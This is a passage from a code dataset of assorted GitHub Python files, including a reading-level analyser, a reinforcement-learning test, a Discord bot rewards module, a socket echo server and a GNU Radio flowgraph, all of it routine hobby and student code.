Globals.total_sentences = get_number_of_sentences(Globals.file_content)\n\n reading_level_score = calculate_reading_level_score(Globals.total_words,\n Globals.total_sentences,\n Globals.total_syllables)\n\n reading_level = convert_score_to_reading_level(reading_level_score)\n\n print(\"Total Sentences: \" + str(Globals.total_sentences))\n print(\"Total Words: \" + str(Globals.total_words))\n print(\"Total Syllables \" + str(Globals.total_syllables))\n print(\"Reading Level Score \" + str(reading_level_score))\n print(\"Reading Level: \" + str(reading_level))\n\n if Globals.shouldModify:\n print(\"Changing Reading Level to \" + Globals.target_reading_level)\n ChangeLevel.change_level()\n\n\nif __name__ == \"__main__\":\n\n # Check for an input file\n if len(sys.argv) == 2:\n # Analyze reading level data\n Globals.input_file = sys.argv[1]\n elif len(sys.argv) == 3:\n # Analyze reading data and modify to reach target\n Globals.input_file = sys.argv[1]\n Globals.shouldModify = 
True\n Globals.target_reading_level = sys.argv[2]\n elif len(sys.argv) < 2:\n print(\"Too few arguments provided\")\n print(\"On EOS Try: python3 main.py input.txt {targetLevel}\")\n sys.exit(2)\n elif len(sys.argv) > 3:\n print(\"Too many arguments\")\n print(\"On EOS Try: python3 main.py input.txt {targetLevel}\")\n sys.exit(2)\n\n # Run the program\n main()\n","repo_name":"charlesbillingsley/readingLevelProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"33455402074","text":"#====================================== 6. Test Model\nimport os\nimport gym\nfrom stable_baselines3 import PPO\nfrom stable_baselines3.common.vec_env import DummyVecEnv\nfrom stable_baselines3.common.evaluation import evaluate_policy\n\nenvironment_name = 'CartPole-v0'\nenv = gym.make(environment_name)\nPPO_Path = os.path.join('Training','Saved Models','PPO_Model_Cartpole')\nmodel = PPO.load(PPO_Path)\n\nepisodes = 5\nfor episode in range(1, episodes+1):\n obs = env.reset()\n done = False\n score = 0\n \n while not done:\n env.render()\n action, _ = model.predict(obs)\n obs, reward, done, info = env.step(action)\n score += reward\n print('Episode:{} Score:{}'.format(episode, score))\nenv.close()","repo_name":"ScorelessPine/Reinforcement_Learning_Project","sub_path":"MainCourseTest.py","file_name":"MainCourseTest.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2737100402","text":"# Creating predictions for the drawings here\n\nimport os\nimport cv2 \nimport time\nimport logging\nimport numpy as np \nimport tensorflow as tf \nfrom helpers import draw\nfrom helpers.utils import *\nfrom configs.gui_configs import *\n\ntf.get_logger().setLevel(logging.ERROR)\n\nclass Inference:\n def __init__(self, generator_path, original_shape, sample_shape):\n self.original_shape = original_shape\n self.sample_shape = sample_shape\n self.sample = None\n self.pred = None\n self.generator = tf.keras.models.load_model(generator_path)\n \n def prepare(self, sample):\n sample = resize(sample, self.sample_shape)\n sample = convert_channel(sample, cv2.COLOR_BGR2RGB)\n sample = normalize(sample.reshape(-1, *self.sample_shape))\n self.sample = sample.copy()\n \n def generate(self):\n pred = self.generator.predict(self.sample)\n self.sample = None \n self.pred = pred\n \n def get_outcome(self, auto_resize=True):\n pred = denormalize(self.pred.squeeze())\n pred = convert_channel(pred, cv2.COLOR_RGB2BGR)\n if auto_resize:\n pred = resize(pred, self.original_shape)\n return pred\n \nclass Result:\n def __init__(self, screen, original, result, pts, wX, wY):\n self.screen = screen.copy()\n self.screen[pts[0]-pts[1]: pts[0]+pts[1],\n pts[2]-pts[3]: pts[2]+pts[3]] = result\n self.original = original\n self.result = result\n self.wX, self.wY = wX, wY\n self.paint_helper = draw.Paint()\n self.color = [0, 0, 0]\n self.switch_color = False\n self.indices = [0, 1, 2]\n self.button_boxes = [(0, 0, 0) for _ in range(2)]\n self.button_times = [None, None]\n self.choice_made = False\n \n def gradient_title(self):\n if not self.switch_color:\n if self.color[self.indices[0]] != 255:\n self.color[self.indices[0]] += 5\n else:\n if self.color[self.indices[1]] != 255:\n self.color[self.indices[1]] += 5\n else:\n if self.color[self.indices[2]] != 255:\n self.color[self.indices[2]] += 5\n else: \n 
self.switch_color = True \n np.random.shuffle(self.indices)\n else:\n if self.color[self.indices[0]] != 0:\n self.color[self.indices[0]] -= 5\n else:\n if self.color[self.indices[1]] != 0:\n self.color[self.indices[1]] -= 5\n else:\n if self.color[self.indices[2]] != 0:\n self.color[self.indices[2]] -= 5\n else: \n self.switch_color = False\n np.random.shuffle(self.indices)\n \n def check_events(self, event, x, y, flags, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n self.check_return_choice(x, y)\n self.check_save_choice(x, y)\n \n def check_return_choice(self, x, y):\n if x <= gX2+60 and x >= gX+110:\n if y <= gY2-10 and y >= gY+20:\n self.button_boxes[1] = (200, 0, 200)\n self.button_times[1] = time.time()\n self.choice_made = True\n \n def check_save_choice(self, x, y):\n if x <= gX2-110 and x >= gX-60:\n if y <= gY2-10 and y >= gY+20:\n self.button_boxes[0] = (0, 200, 0)\n self.button_times[0] = time.time()\n os.system(\"mkdir result\")\n cv2.imwrite(os.sep.join([\"result\", \"result.jpg\"]), self.result)\n cv2.imwrite(os.sep.join([\"result\", \"input.jpg\"]), self.original)\n \n def start(self):\n cv2.namedWindow(\"UStar\", cv2.WINDOW_NORMAL)\n cv2.resizeWindow(\"UStar\", 812, 478)\n cv2.moveWindow(\"UStar\", self.wX, self.wY-95)\n while not self.choice_made:\n screen = self.paint_helper.save_button(self.screen, gX-60, gY+20, gX2-110, gY2-10)\n screen = self.paint_helper.return_button(screen, gX+110, gY+20, gX2+60, gY2-10)\n self.gradient_title()\n cv2.setMouseCallback(\"UStar\", self.check_events)\n cv2.putText(screen, \"Your Imaginary Star\", (270, 70), cv2.FONT_HERSHEY_TRIPLEX,\n 1.0, self.color, 2)\n screen = self.paint_helper.button_alignment(screen,\n [(gX-60, gY+20), (gX2-110, gY2-10)],\n self.button_boxes[0])\n screen = self.paint_helper.button_alignment(screen,\n [(gX+110, gY+20), (gX2+60, gY2-10)],\n self.button_boxes[1])\n cv2.imshow(\"UStar\", screen)\n if cv2.waitKey(1) == ord(\"q\"):\n quit()\n self.button_boxes[0], self.button_times[0] = self.paint_helper.update_button(self.button_boxes[0],\n self.button_times[0])\n self.button_boxes[1], self.button_times[1] = self.paint_helper.update_button(self.button_boxes[1],\n self.button_times[1])\n cv2.destroyWindow(\"UStar\")\n \n","repo_name":"Moeed1mdnzh/UStar-GUI","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"69919099999","text":"\"\"\" Run program \"\"\"\nimport argparse\nimport logging\nfrom social_media_scraper.run import run\n\nparser_description = \"\"\"\nSettings for application\nExample usage:\npython -m social_media_scraper -m full -i \"./example-identification.csv\" -o \"./output.db\" -lb 1 -ub 3 -d -s -g \"/path/to/driver/geckodriver.exe\"\n\"\"\"\n\nparser = argparse.ArgumentParser(description=parser_description)\n\nparser.add_argument(\"-m\", \"--mode\", help=\"Scrape user account, match identity by data or both (pass acc, id or full respectively)\", type=str, required=True)\nparser.add_argument(\"-i\", \"--input\", help=\"Input file location\", type=str)\nparser.add_argument(\"-o\", \"--output\", help=\"Output file location\", type=str)\nparser.add_argument(\"-lb\", \"--lower_bound\", help=\"Request frequency lower bound\", type=int)\nparser.add_argument(\"-ub\", \"--upper_bound\", help=\"Request frequency upper bound\", type=int)\nparser.add_argument(\"-g\", \"--geckodriver\", type=str, help=\"Set path for geckodriver\")\nparser.add_argument(\"-d\", 
\"--debugging\", help=\"Runs application in debug mode (will log debug logs into console)\", action=\"store_true\")\nparser.add_argument(\"-s\", \"--sql\", help=\"Log sql into console\", action=\"store_true\")\nparser.add_argument(\"-int\", \"--interface\", help=\"Run app in account scraping mode with interface\", action=\"store_true\")\nparser.add_argument(\"-tp\", \"--twitter_profile\", help=\"Firefox profile path for twitter (Should have GoodTwitter addon because of redesign)\", type=str)\n\nargs = parser.parse_args()\n\nif args.debugging:\n logging.basicConfig(level=logging.INFO)\n\nrun(args)\n","repo_name":"dmitrijbozhkov/SocialMediaScraper","sub_path":"social_media_scraper/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25007605142","text":"import pymongo\nimport asyncio\nimport time\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Context\nfrom discord import app_commands\nfrom datetime import datetime, timedelta\nimport time\nimport random\nimport tok\n\nMONGO = tok.mongo\nclient = pymongo.MongoClient(MONGO)\ndb = client.DiscordJasperBot\n\n# ❔\n# ✅\n# 🍃\n#\ndef generate_rewards(user_id:int,lootID:str):\n #Put a badge checker\n #Badge Description\n #Some Sytem to make sure you dont see badge twice after claim\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n catData = db.OnAdventure.find_one({\"_id\": user_id})\n catData[\"Total\"] += 1\n rewards = []\n if lootID == \"Tree\":\n catData[\"GC\"] += 1\n ran1 = int(random.randint(1, 10))\n ran2 = int(random.randint(1, 100))\n if ran2 == 69:\n userData[\"3G\"] = True\n rewards.append(\"Grass Lands Badge 3\")\n if ran1 == 10:\n userData[\"1G\"] = True\n userData[\"Grass\"] += 8\n rewards.append(\"Grass Lands Badge 1\")\n rewards.append(\"8 Grass\")\n elif ran1 <= 5:\n userData[\"Grass\"] += 3\n rewards.append(\"3 Grass\")\n elif ran1 <= 8:\n userData[\"Grass\"] += 5\n rewards.append(\"5 Grass\")\n \n #Insert\n elif lootID == \"Sand\":\n catData[\"SC\"] += 1\n ran1 = int(random.randint(1, 32))\n if ran1 == 32:\n userData[\"1S\"] = True\n userData[\"Sand\"] += 12\n userData[\"Glass\"] += 3\n rewards.append(\"Desert Dunes Badge 1\")\n rewards.append(\"12 Sand\")\n rewards.append(\"3 Glass\")\n elif ran1 <= 31:\n userData[\"Sand\"] += 8\n userData[\"Glass\"] += 2\n rewards.append(\"2 Glass\")\n rewards.append(\"8 Sand\")\n elif ran1 <= 25:\n userData[\"Sand\"] += 5\n userData[\"Glass\"] += 1\n rewards.append(\"1 Glass\")\n rewards.append(\"5 Sand\")\n elif ran1 <= 16:\n userData[\"Sand\"] += 3\n rewards.append(\"3 Sand\")\n\n #Insert\n elif lootID == \"Snow\":\n catData[\"SNC\"] += 1\n ran1 = int(random.randint(1, 32))\n if ran1 == 32:\n userData[\"1SN\"] = True\n userData[\"Snow\"] += 8\n userData[\"Ice\"] += 4\n rewards.append(\"Frost Wastelands Badge 1\")\n rewards.append(\"8 Snow\")\n rewards.append(\"4 Ice\")\n elif ran1 <= 31:\n userData[\"Snow\"] += 6\n userData[\"Ice\"] += 3\n rewards.append(\"3 Ice\")\n rewards.append(\"6 Snow\")\n elif ran1 <= 25:\n userData[\"Snow\"] += 4\n userData[\"Ice\"] += 2\n rewards.append(\"2 Ice\")\n rewards.append(\"4 Snow\")\n elif ran1 <= 16:\n userData[\"Snow\"] += 2\n userData[\"Ice\"] += 1\n rewards.append(\"2 Snow\")\n rewards.append(\"1 Ice\")\n\n #Insert\n elif lootID == \"Jungle\":\n catData[\"OC\"] += 1\n ran1 = int(random.randint(1, 20))\n if ran1 == 20:\n userData[\"1O\"] = True\n userData[\"Grass\"] += 
24\n userData[\"Wood\"] += 8\n userData[\"Corn\"] += 1 \n rewards.append(\"Orangutan Jungle Badge 1\")\n rewards.append(\"24 Grass\")\n rewards.append(\"8 Wood\")\n rewards.append(\"1 Corn!!(Rare)\")\n elif ran1 <= 19:\n userData[\"Grass\"] += 16\n userData[\"Wood\"] += 5\n rewards.append(\"16 Grass\")\n rewards.append(\"5 Wood\")\n elif ran1 <= 15:\n userData[\"Grass\"] += 10\n userData[\"Wood\"] += 3\n rewards.append(\"10 Grass\")\n rewards.append(\"3 Wood\")\n elif ran1 <= 9:\n userData[\"Grass\"] += 6\n userData[\"Wood\"] += 2\n rewards.append(\"6 Grass\")\n rewards.append(\"2 Wood\")\n\n #Insert\n elif lootID == \"Glass\":\n catData[\"GDC\"] += 1\n ran1 = int(random.randint(1, 50))\n if ran1 >= 48:\n userData[\"1GD\"] = True\n userData[\"Sand\"] += 24\n userData[\"Ice\"] += 4\n userData[\"Gem\"] += 1 \n rewards.append(\"Glass Desert Badge 1\")\n rewards.append(\"24 Sand\")\n rewards.append(\"8 Ice\")\n rewards.append(\"1 Gem!!(Rare)\")\n elif ran1 == 11:\n userData[\"3GD\"] = True\n userData[\"Gem\"] += 3 \n rewards.append(\"3 Gems!!! (Super Rare)\") \n rewards.append(\"Glass Desert Badge 3\") \n elif ran1 <= 47:\n userData[\"Sand\"] += 16\n userData[\"Glass\"] += 8\n #FINISH\n rewards.append(\"16 Sand\")\n rewards.append(\"8 Glass\")\n elif ran1 <= 37:\n userData[\"Sand\"] += 10\n userData[\"Glass\"] += 5\n rewards.append(\"10 Sand\")\n rewards.append(\"5 Glass\")\n elif ran1 <= 20:\n userData[\"Sand\"] += 8\n userData[\"Glass\"] += 4\n rewards.append(\"8 Sand\")\n rewards.append(\"4 Glass\")\n\n #Insert\n elif lootID == \"Ohio\":\n catData[\"OHC\"] += 1\n ran1 = int(random.randint(1, 50))\n if ran1 >= 48:\n userData[\"1OH\"] = True\n userData[\"Wood\"] += 20\n userData[\"Gem\"] += 1\n userData[\"Corn\"] += 4\n userData[\"Kernal\"] += 23\n rewards.append(\"Ohio Badge 1\")\n rewards.append(\"20 Wood\")\n rewards.append(\"23 Kernal\")\n rewards.append(\"4 Corn!(Rare)\")\n rewards.append(\"1 Gem!!(Rare)\")\n elif ran1 == 8:\n userData[\"3OH\"] = True\n userData[\"Corn\"] += 6\n userData[\"Kernal\"] += 69\n rewards.append(\"69 Kernal!(Rare)\")\n rewards.append(\"6 Corn!!! 
(Super Rare)\") \n            rewards.append(\"Ohio Badge 3\") \n        elif ran1 <= 47:\n            userData[\"Wood\"] += 14\n            userData[\"Corn\"] += 1\n            userData[\"Kernal\"] += 16\n            rewards.append(\"16 Kernal\")\n            rewards.append(\"14 Wood\")\n            rewards.append(\"1 Corn\")\n        elif ran1 <= 37:\n            userData[\"Wood\"] += 10\n            userData[\"Kernal\"] += 12\n            rewards.append(\"12 Kernal\")\n            rewards.append(\"10 Wood\")\n        elif ran1 <= 20:\n            userData[\"Wood\"] += 6\n            userData[\"Kernal\"] += 10\n            rewards.append(\"10 Kernal\")\n            rewards.append(\"6 Wood\")\n\n    db.RewardHold.insert_one({\"_id\":user_id,\"rewards\":rewards})\n    rewards.clear()\n    db.OnAdventure.replace_one({\"_id\":user_id}, catData)\n    db.UserAdventure.replace_one({\"_id\": user_id},userData)\n\ndef description_Tree(user_id:int)->str:\n    userData = db.UserAdventure.find_one({\"_id\": user_id})\n    #True and False will be emojis True(Badge) False(?)\n    G1,G2,G3,G4 = \"E\",\"E\",\"E\",\"E\"\n    if userData[\"1G\"] == True:\n        G1 = \"✅\"\n    else:\n        G1 = \"❔\"\n    if userData[\"2G\"] == True:\n        G2 = \"✅\"\n    else:\n        G2 = \"❔\"\n    if userData[\"3G\"] == True:\n        G3 = \"✅\"\n    else:\n        G3 = \"❔\"\n    if userData[\"4G\"] == True:\n        G4 = \"✅\"\n    else:\n        G4 = \"❔\"\n\n    Grass = \"E\"\n    if userData[\"Grass\"] > 0:\n        Grass = \"🍃\"\n    else:\n        Grass = \"❔\"\n    \n    des = f\"We all start somewhere and the Grasslands is a perfect starting area with lots of green hills and meadows.\nRisk 0%\nBadges unlocked {G1},{G2},{G3},{G4}\nLoot in area {Grass}\"\n    return des\n\ndef description_Sand(user_id:int)->str:\n    userData = db.UserAdventure.find_one({\"_id\": user_id})\n    #True and False will be emojis True(Badge) False(?)\n    S1,S2 = \"E\",\"E\"\n    if userData[\"1S\"] == True:\n        S1 = \"✅\"\n    else:\n        S1 = \"❔\"\n    if userData[\"2S\"] == True:\n        S2 = \"✅\"\n    else:\n        S2 = \"❔\"\n    Sand,Glass = \"E\",\"E\"\n    if userData[\"Sand\"] > 0:\n        Sand = \"⏳\"\n    else:\n        Sand = \"❔\"\n    if userData[\"Glass\"] > 0:\n        Glass = \"🪟\"\n    else: \n        Glass = \"❔\"\n    des = f\"As you venture further you enter the dunes filled with nothing but sand and that one tumbleweed during a shoot-off, hopefully you will find a desert temple \nRisk 0%\nBadges unlocked {S1},{S2}\nLoot in area {Sand},{Glass}\"\n    return des\n\ndef description_Frost(user_id:int)->str:\n    userData = db.UserAdventure.find_one({\"_id\": user_id})\n    #True and False will be emojis True(Badge) False(?)\n    SN1,SN2 = \"E\",\"E\"\n    if userData[\"1SN\"] == True:\n        SN1 = \"✅\"\n    else:\n        SN1 = \"❔\"\n    if userData[\"2SN\"] == True:\n        SN2 = \"✅\"\n    else:\n        SN2 = \"❔\"\n    Snow,Ice = \"E\",\"E\"\n    if userData[\"Snow\"] > 0:\n        Snow = \"❄️\"\n    else:\n        Snow = \"❔\"\n    if userData[\"Ice\"] > 0:\n        Ice = \"🧊\"\n    else: \n        Ice = \"❔\"\n    \n    des = f\"After you finish crossing the sand desert you approach a new desert made out of snow and ice. 
With blue spruces on a flat wasteland who knows if you will find anything good.\nRisk 0%\nBadges unlocked {SN1},{SN2}\nLoot in area {Snow},{Ice}\"\n    return des\n\n\ndef description_Jungle(user_id:int)->str:\n    userData = db.UserAdventure.find_one({\"_id\": user_id})\n    #True and False will be emojis True(Badge) False(?)\n    O1,O2 = \"E\",\"E\"\n    if userData[\"1O\"] == True:\n        O1 = \"✅\"\n    else:\n        O1 = \"❔\"\n    if userData[\"2O\"] == True:\n        O2 = \"✅\"\n    else:\n        O2 = \"❔\"\n    Grass,Wood,Corn = \"E\",\"E\",\"E\"\n    if userData[\"Grass\"] > 0:\n        Grass = \"🍃\"\n    else:\n        Grass = \"❔\"\n    if userData[\"Wood\"] > 0:\n        Wood = \"🪵\"\n    else: \n        Wood = \"❔\"\n    if userData[\"Corn\"] > 0:\n        Corn = \"🌽\"\n    else: \n        Corn = \"❔\"\n    \n    des = f\"You enter a forest filled with monkeys idkkk what else to say I am tired\nRisk 5%\nBadges unlocked {O1},{O2}\nLoot in area {Grass},{Wood},{Corn}\"\n    return des\n\n\n\ndef description_EnchForest(user_id:int)->str:\n    userData = db.UserAdventure.find_one({\"_id\": user_id})\n    #True and False will be emojis True(Badge) False(?)\n    O1,O2 = \"E\",\"E\"\n    if userData[\"1O\"] == True:\n        O1 = \"✅\"\n    else:\n        O1 = \"❔\"\n    if userData[\"2O\"] == True:\n        O2 = \"✅\"\n    else:\n        O2 = \"❔\"\n    Grass,Wood = \"E\",\"E\"\n    if userData[\"Grass\"] > 0:\n        Grass = \"🍃\"\n    else:\n        Grass = \"❔\"\n    if userData[\"Wood\"] > 0:\n        Wood = \"🪵\"\n    else: \n        Wood = \"❔\"\n    \n    des = f\"\nRisk 5%\nBadges unlocked {O1},{O2}\nLoot in area {Grass},{Wood}\"\n    return des\n\n\n\ndef description_Glass(user_id:int)->str:\n    userData = db.UserAdventure.find_one({\"_id\": user_id})\n    GD1,GD2,GD3 = \"E\",\"E\",\"E\"\n    if userData[\"1GD\"] == True:\n        GD1 = \"✅\"\n    else:\n        GD1 = \"❔\"\n    if userData[\"2GD\"] == True:\n        GD2 = \"✅\"\n    else:\n        GD2 = \"❔\"\n    if userData[\"3GD\"] == True:\n        GD3 = \"✅\"\n    else:\n        GD3 = \"❔\"\n    Sand,Ice,Glass,Gem = \"E\",\"E\",\"E\",\"E\"\n    if userData[\"Sand\"] > 0:\n        Sand = \"⏳\"\n    else:\n        Sand = \"❔\"\n    if userData[\"Ice\"] > 0:\n        Ice = \"🧊\"\n    else: \n        Ice = \"❔\"\n    if userData[\"Glass\"] > 0:\n        Glass = \"🪟\"\n    else: \n        Glass = \"❔\"\n    if userData[\"Gem\"] > 0:\n        Gem = \"💎\"\n    else: \n        Gem = \"❔\"\n    des = f\"\nRisk 5%\nBadges unlocked {GD1},{GD2},{GD3}\nLoot in area {Sand},{Glass},{Ice},{Gem}\"\n    return des\n\ndef description_Ohio(user_id:int)->str:\n    userData = db.UserAdventure.find_one({\"_id\": user_id})\n    OH1,OH2,OH3 = \"E\",\"E\",\"E\"\n    if userData[\"1OH\"] == True:\n        OH1 = \"<:amonguspog:886652968051560488>\"\n    else:\n        OH1 = \"❔\"\n    if userData[\"2OH\"] == True:\n        OH2 = \"<:amonguspog:886652968051560488>\"\n    else:\n        OH2 = \"❔\"\n    if userData[\"3OH\"] == True:\n        OH3 = \"<:amonguspog:886652968051560488>\"\n    else:\n        OH3 = \"❔\"\n    Wood,Kernal,Gem,Corn = \"E\",\"E\",\"E\",\"E\"\n    if userData[\"Wood\"] > 0:\n        Wood = \"🪵\"\n    else:\n        Wood = \"❔\"\n    if userData[\"Kernal\"] > 0:\n        Kernal = \"🍿\"\n    else: \n        Kernal = \"❔\"\n    if userData[\"Corn\"] > 0:\n        Corn = \"🌽\"\n    else: \n        Corn = \"❔\"\n    if userData[\"Gem\"] > 0:\n        Gem = \"💎\"\n    else: \n        Gem = \"❔\"\n    des = f\"\nRisk 0%\nBadges unlocked {OH1},{OH2},{OH3}\nLoot in area {Kernal},{Wood},{Gem},{Corn}\"\n    return des","repo_name":"TrippingLettuce/AdventureBot","sub_path":"rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":12400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23513460659","text":"import socket\nimport termcolor\nimport sys\n# Configure the Server's IP and PORT\nPORT = 8089\nIP = 
\"212.128.253.101\"\nMAX_OPEN_REQUESTS = 5\n\ndef process_client(cs): #The parameter will be the socket for communicating with the client\n # Read client message.\n msg = cs.recv(2048).decode(\"utf-8\")\n\n termcolor.cprint(\"Message from the client: {}\".format(msg), 'blue')\n if msg == 'EXIT':\n sys.exit(0)\n\n cs.send(str.encode(msg)) #We have to decode and then code again\n #Sending message to the client\n # Close the socket\n cs.close()\n\n# create a socket for connecting with the clients\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\nserversocket.bind((IP, PORT))\n\nserversocket.listen(MAX_OPEN_REQUESTS)\n\nprint(\"Socket ready: {}\".format(serversocket))\n\nwhile True:\n # The server is waiting for connections\n print(\"Waiting for connections at {}, {} \".format(IP, PORT))\n (clientsocket, address) = serversocket.accept() #Once the client is connected it will print the IP\n\n #. . . Process the client request\n print(\"Attending client: {}\".format(address))\n\n process_client(clientsocket)\n\n","repo_name":"gemabbaz/2018-19-PNE-practices","sub_path":"Session 9/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3065694783","text":"from matplotlib import pyplot as plt\nimport pandas as pd\n\n\ndef plotReports(assets, stocks, crypto):\n\tf1 = plt.figure(1)\n\tax1 = f1.add_axes([0, 0, 1, 1])\n\tax1.axis('equal')\n\t\n\tax1.pie(assets[1], labels=assets[0], autopct='%1.2f%%')\n\n\n\tf2 = plt.figure(2)\n\tax2 = f2.add_axes([0, 0, 1, 1])\n\tax2.axis('equal')\n\tax2.pie(stocks[1], labels=stocks[0], autopct='%1.2f%%')\n\n\n\tf3 = plt.figure(3)\n\tax3 = f3.add_axes([0, 0, 1, 1])\n\tax3.axis('equal')\n\tax3.pie(crypto[1], labels=crypto[0], autopct='%1.2f%%')\n\n\tplt.show()\n","repo_name":"MarkusZoppelt/finance","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42605724975","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\n\nclass Bitcoininfo1Item(Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n post = Field()\n page_number = Field()\n url = Field()\n author = Field()\n subject = Field()\n #time = Field()\n message_number = Field()","repo_name":"niranjan-sa/MerkelScience","sub_path":"bitcoininfo1/bitcoininfo1/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5350182662","text":"class Card:\n def __init__(self, image, name, type, nation, race, grade, power, critical, shield, skill, effect, regulation, number, rarity):\n self.image = image\n self.name = name\n self.type = type\n self.nation = nation\n self.race = race\n self.grade = grade\n self.power = power\n self.critical = critical\n self.shield = shield\n self.skill = skill\n self.effect = effect\n self.regulation = regulation\n self.number = number\n self.rarity = rarity","repo_name":"manhlamabc123/PDP-Area-data","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} 
+{"seq_id":"71386581917","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#\n# SPDX-License-Identifier: GPL-3.0\n#\n# GNU Radio Python Flow Graph\n# Title: AccessControl\n# Description: IMPLEMENTACIÓN DE UN SISTEMA DE COMUNICACIONES BASADO EN SDR MEDIANTE GNU RADIO // Carpio_LoopezDeCastro_Jorge_tfg.pdf // C:\\Users\\Alex\\Dropbox\\DegreeProject\\Papers 2 // Pag. 25 o 39\n# GNU Radio version: 3.9.5.0\n\nfrom distutils.version import StrictVersion\n\nif __name__ == '__main__':\n import ctypes\n import sys\n if sys.platform.startswith('linux'):\n try:\n x11 = ctypes.cdll.LoadLibrary('libX11.so')\n x11.XInitThreads()\n except:\n print(\"Warning: failed to XInitThreads()\")\n\nfrom PyQt5 import Qt\nfrom gnuradio import qtgui\nimport sip\nfrom gnuradio import blocks\nimport pmt\nfrom gnuradio import digital\nfrom gnuradio import gr\nfrom gnuradio.filter import firdes\nfrom gnuradio.fft import window\nimport sys\nimport signal\nfrom argparse import ArgumentParser\nfrom gnuradio.eng_arg import eng_float, intx\nfrom gnuradio import eng_notation\n\n\n\nfrom gnuradio import qtgui\n\nclass AccessControl(gr.top_block, Qt.QWidget):\n\n def __init__(self):\n gr.top_block.__init__(self, \"AccessControl\", catch_exceptions=True)\n Qt.QWidget.__init__(self)\n self.setWindowTitle(\"AccessControl\")\n qtgui.util.check_set_qss()\n try:\n self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))\n except:\n pass\n self.top_scroll_layout = Qt.QVBoxLayout()\n self.setLayout(self.top_scroll_layout)\n self.top_scroll = Qt.QScrollArea()\n self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)\n self.top_scroll_layout.addWidget(self.top_scroll)\n self.top_scroll.setWidgetResizable(True)\n self.top_widget = Qt.QWidget()\n self.top_scroll.setWidget(self.top_widget)\n self.top_layout = Qt.QVBoxLayout(self.top_widget)\n self.top_grid_layout = Qt.QGridLayout()\n self.top_layout.addLayout(self.top_grid_layout)\n\n self.settings = Qt.QSettings(\"GNU Radio\", \"AccessControl\")\n\n try:\n if StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n self.restoreGeometry(self.settings.value(\"geometry\").toByteArray())\n else:\n self.restoreGeometry(self.settings.value(\"geometry\"))\n except:\n pass\n\n ##################################################\n # Variables\n ##################################################\n self.samp_rate = samp_rate = 32000\n\n ##################################################\n # Blocks\n ##################################################\n self.qtgui_number_sink_0 = qtgui.number_sink(\n gr.sizeof_char,\n 0,\n qtgui.NUM_GRAPH_HORIZ,\n 1,\n None # parent\n )\n self.qtgui_number_sink_0.set_update_time(0.10)\n self.qtgui_number_sink_0.set_title(\"\")\n\n labels = ['', '', '', '', '',\n '', '', '', '', '']\n units = ['', '', '', '', '',\n '', '', '', '', '']\n colors = [(\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"),\n (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\")]\n factor = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n\n for i in range(1):\n self.qtgui_number_sink_0.set_min(i, -1)\n self.qtgui_number_sink_0.set_max(i, 1)\n self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])\n if len(labels[i]) == 0:\n self.qtgui_number_sink_0.set_label(i, \"Data {0}\".format(i))\n else:\n self.qtgui_number_sink_0.set_label(i, labels[i])\n self.qtgui_number_sink_0.set_unit(i, units[i])\n self.qtgui_number_sink_0.set_factor(i, factor[i])\n\n 
self.qtgui_number_sink_0.enable_autoscale(False)\n self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.qwidget(), Qt.QWidget)\n self.top_layout.addWidget(self._qtgui_number_sink_0_win)\n self.digital_correlate_access_code_xx_ts_0 = digital.correlate_access_code_bb_ts('11100001010110101110100010010011',\n 0, 'packet_len')\n self.blocks_unpack_k_bits_bb_0 = blocks.unpack_k_bits_bb(8)\n self.blocks_tagged_stream_to_pdu_0 = blocks.tagged_stream_to_pdu(blocks.byte_t, 'packet_len')\n self.blocks_tagged_stream_align_0 = blocks.tagged_stream_align(gr.sizeof_char*1, 'packet_len')\n self.blocks_pdu_to_tagged_stream_0 = blocks.pdu_to_tagged_stream(blocks.byte_t, 'packet_len')\n self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(8)\n self.blocks_file_source_0 = blocks.file_source(gr.sizeof_char*1, 'G:\\\\My Drive\\\\ProgrammingProject\\\\MaquinaNativa1\\\\encrypted_data.bin', True, 0, 0)\n self.blocks_file_source_0.set_begin_tag(pmt.PMT_NIL)\n 